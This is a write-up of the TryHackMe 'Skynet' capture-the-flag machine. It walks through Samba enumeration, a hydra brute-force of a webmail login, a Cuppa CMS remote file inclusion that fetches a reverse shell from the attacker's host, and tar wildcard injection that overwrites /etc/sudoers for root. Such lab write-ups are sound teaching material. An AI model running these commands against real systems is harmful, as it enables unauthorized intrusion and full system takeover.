Skynet | TryHackMe Challenge Writeup

Hello, fellow hackers!

In this write-up, I’ll walk you through my solution for an easy TryHackMe challenge called Skynet, which is themed around the Terminator universe.

You can find the challenge here. I recommend trying to solve it on your own first and using this write-up only if you get stuck — or feel free to follow along step by step.

The objective is simple: gain root access to the target machine.

Let’s get started. 💻🔥

🔍 Port Scanning with Nmap

First, we scan the target machine with Nmap to identify open ports and running services:

nmap -sV -sC -T4 -Pn 10.10.113.118

📋 Nmap Output (Trimmed & Highlighted)

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2
80/tcp  open  http        Apache httpd 2.4.18 (Ubuntu)
110/tcp open  pop3        Dovecot pop3d
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X
143/tcp open  imap        Dovecot imapd
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu

At this point, we know the machine is running:

• SSH – for secure shell access

• HTTP – potentially a custom web app (we’ll investigate)

• POP3/IMAP – may expose email credentials

• Samba – might allow unauthenticated file share access

📂 Checking Samba Shares

Since Samba may allow access to shared files, we start there before exploring the web server — we might get lucky and find something useful.

We list the available shares:

smbclient -N -L //10.10.159.31/

Output:

Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
anonymous       Disk      Skynet Anonymous Share
milesdyson      Disk      Miles Dyson Personal Share
IPC$            IPC       IPC Service (skynet server (Samba, Ubuntu))

The anonymous share looks interesting, so we connect:

smbclient -N //10.10.159.31/anonymous

We explore the contents:

smb: \> ls
  attention.txt
  logs/

smb: \> cd logs
smb: \logs\> ls
  log1.txt
  log2.txt
  log3.txt

We download attention.txt and log1.txt (the others are empty).

📄 attention.txt

A recent system malfunction has caused various passwords to be changed. All Skynet employees are required to change their password after seeing this.

- Miles Dyson

📄 log1.txt (Password List)

cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
...
Walterminator
79terminator6
1996terminator

🧠 Analysis

We now know:

• There's been a password reset.

• We've recovered a potential wordlist (probably auto-generated passwords).

• The first challenge question is:
  "What is Miles' password for his emails?"

Naturally, you might try brute-forcing:

• IMAP or POP3 logins using milesdyson

• Or accessing the milesdyson Samba share

But I’ll save you some time — I tried them all, and had no luck. So the correct path forward lies elsewhere — maybe the web service can give us more clues 👀

🌐 Exploring the Website

The main webpage doesn’t reveal much — just a basic search bar with Skynet Search and an I’m Feeling Lucky button. Pretty minimal, so it’s time to start digging for hidden directories.

🔍 Gobuster Scan

gobuster dir -u http://10.10.159.31 -w Tools/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt

Results:

/admin                (Status: 301)
/css                  (Status: 301)
/js                   (Status: 301)
/config               (Status: 301)
/ai                   (Status: 301)
/squirrelmail         (Status: 301)
/server-status        (Status: 403)

Interesting find — /squirrelmail. That looks like a webmail client. Since the second challenge question is "What is the hidden directory?", this seems promising... but spoiler: squirrelmail is not the correct answer to that one (you’ll find it later 😉). Still, it might help us progress in the challenge.

Navigating to /squirrelmail gives us a login screen — time to bruteforce it using our earlier wordlist.

🔐 Brute-forcing SquirrelMail Login

Let’s try logging in as Miles Dyson with the wordlist we pulled from log1.txt:

hydra -l milesdyson -P log1.txt 10.10.159.31 http-post-form \
"/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^:F=Unknown" -V

And boom 💥 — we get a valid login:

[80][http-post-form] host: 10.10.159.31   login: milesdyson   password: **********

(🔒 Password redacted for you to find on your own 😉)

📬 Inside the Inbox

Once logged in, you’ll find three emails. The first one is gold — it confirms that Miles’ Samba share password was changed, and the new password is right there in plain text.

With this new password, we can now access the protected milesdyson Samba share. Let’s move on and see what goodies we find inside. 🕵️‍♂️

🧠 Revisiting Samba

We’re back at it with the Samba share, now armed with the credentials we snagged from that SquirrelMail inbox.

smbclient //10.10.159.31/milesdyson -U milesdyson

After logging in, we check the file list:

Improving Deep Neural Networks.pdf
Natural Language Processing-Building Sequence Models.pdf
Convolutional Neural Networks-CNN.pdf
Neural Networks and Deep Learning.pdf
Structuring your Machine Learning Project.pdf
notes/

Looks like Miles is knee-deep in machine learning studies. But the real treasure is probably not inside academic PDFs — let’s check that notes/ directory.

Jackpot: Among all the markdowns, one file stands out like a sore thumb… important.txt

Contents:

1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife

Welp, we found our hidden directory:
👉 /45kra24zxs28v3yd

🕳️ Down the Rabbit Hole

Of course, the first thing I did was what any of us would do: look for even more hidden folders inside the hidden folder. Classic move. Eventually, I stumbled upon an admin panel that had:

• A login form ✅

• A reset password function ✅

Naturally, I thought I was onto something big... and then boom, hit a wall.

Not gonna lie — I burned a lot of time down this path before I had to sneak a peek at this write-up. Turns out I was completely off-track with my solution. 😅

⚙️ Exploiting the CMS

So, the hidden site we found earlier is running Cuppa CMS.

After a bit of Googling, I discovered that this CMS is vulnerable to a Remote File Inclusion (RFI) attack — and that answers our third question. The exploit can be found here.

Using this vulnerability, we can include a malicious PHP file like a reverse shell from our own server. I used this online reverse shell generator to whip one up.

🔧 Steps to Exploit

1. Create a folder on your machine and drop your PHP reverse shell inside it.

2. Serve it using Python:

    python3 -m http.server 8000
   

3. Start your listener on another terminal:

    nc -lvnp 4444
   

4. Trigger the RFI vulnerability using a crafted URL that points to your malicious PHP file:

    http://<TARGET_IP>/vulnerable_page.php?language=http://<YOUR_IP>:8000/shell.txt
   

And we get a shell as www-data.

Tip: Don’t forget to stabilize your shell — drop into a proper TTY:

🧑‍💻 User Flag

We're www-data, but luckily the user flag is world-readable — so that’s a quick win. 🎉

🧨 Privilege Escalation

Looking around, we find something juicy:

ls -al /home/milesdyson/backups/backup.sh

Output:

-rwxr-xr-x 1 root root 74 Sep 17  2019 /home/milesdyson/backups/backup.sh

Contents:

#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

We can't modify the script itself — it’s root-owned.
But... we can write to /var/www/html. Suspicious.

Time to check the crontab:

crontab -l

Sure enough:

*/1 * * * * root /home/milesdyson/backups/backup.sh

It runs every minute! ⏱️

🔥 Wildcard Privilege Escalation (via tar)

This one uses a known trick: tar wildcard injection.
Basically, we can exploit how tar handles wildcards to inject a command into the backup process. You can read more about it here.

💣 Here’s How:

1. Navigate to /var/www/html:

2. Inject tar options:

    echo "" > --checkpoint=1
    echo "" > --checkpoint-action=exec=sh\ privesc.sh
   

3. Create the payload script:

    nano privesc.sh
   

   Contents:

    echo 'www-data ALL=(ALL) NOPASSWD: ALL' > /etc/sudoers
   

4. Wait a minute, let cron do its thing.

5. Get root:

    sudo su
   

And now you’re root. Final flag is in /root.

💭 Final Thoughts

This challenge was an absolute blast! It was a rollercoaster, combining everything from enumeration and brute-forcing to vulnerability research and privilege escalation. Each phase kept me on my toes, and it was one of the most rewarding machines I’ve done on TryHackMe.

I’ve learned a lot along the way, especially when it comes to discovering hidden directories, exploiting RFI vulnerabilities, and how to use tar wildcard injection for privilege escalation — something I hadn’t really played with before. It's safe to say that this challenge stretched my skills and knowledge to the limit.

💡 Takeaways:

• Enumeration is king: From discovering hidden directories to finding useful files, taking the time to enumerate thoroughly paid off big time.

• Brute force isn’t always the best option, but when you’ve exhausted other paths, it can sometimes lead you to a breakthrough.

• RFI and reverse shells: It’s always great to revisit old tricks like RFI and shell uploading, but knowing how to generate a reverse shell is key to exploiting many web vulnerabilities.

• Privilege escalation is all about creativity: The wildcard exploit with tar was a game-changer. A simple but incredibly effective trick for escalating privileges in Linux environments.

🔗 Resources Used

Here are the resources that helped me throughout the journey:

• Kahvi-0's Skynet Write-up: A helpful guide that gave me some insight into the machine’s overall structure.

• Revshells: The go-to tool for generating reverse shells to use in web exploitation.

• Exploit-DB Entry for Cuppa CMS: This helped me with the RFI vulnerability that I exploited to get the reverse shell.

• Medium Post on Tar Wildcard Privilege Escalation: A solid read that explained how to abuse tar for privilege escalation.